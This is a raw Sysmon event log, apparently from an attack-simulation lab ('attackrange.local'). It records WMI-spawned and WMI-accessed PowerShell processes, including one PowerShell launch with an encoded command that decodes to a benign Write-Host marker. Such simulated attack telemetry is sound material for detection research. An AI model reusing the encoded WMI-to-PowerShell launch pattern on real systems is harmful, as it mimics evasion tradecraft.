16:53:44.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.476{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encod VwByAGkAdABlAC0ASABvAHMAdAAgADYAMAAwAGEAMwA4ADUANQAtAGUAZQBmADMALQA0ADcANAAyAC0AYgA1ADMANwAtADUAMwAwAGIANgA3ADIAZQBlADkAYgBhAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002238657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002238656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B7669689EFA0A7A30A7EE76B79B4CA0,SHA256=F6CDD697B0B1DB69AA82FECEE59E273091BBAF801C45383B10DC1F924610303E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10676D8F5CD9E65EDA87973F1373E133,SHA256=6F65E34483891D76A5F6C6FFC3C1EA94B7585B23F90850CA3ED3B9E3E2613BFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 